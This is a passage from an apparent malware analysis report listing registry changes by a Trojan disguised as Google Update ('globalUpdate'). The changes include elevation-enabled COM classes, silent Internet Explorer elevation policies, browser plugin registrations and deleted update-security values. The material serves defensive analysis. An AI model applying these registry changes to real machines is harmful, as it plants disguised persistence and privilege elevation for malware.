"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"

[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"

[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"

[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A9 1C BB 6D 1B 3E 23 5B CA 34 A3 A7 1F 07 11 88"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"

[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"

[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"

[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"

[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"

[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"

[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"

[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"

[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"

[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"

[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"

[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"

[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:1272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"

[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"

[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"

[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"

[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1456422024"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"

[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
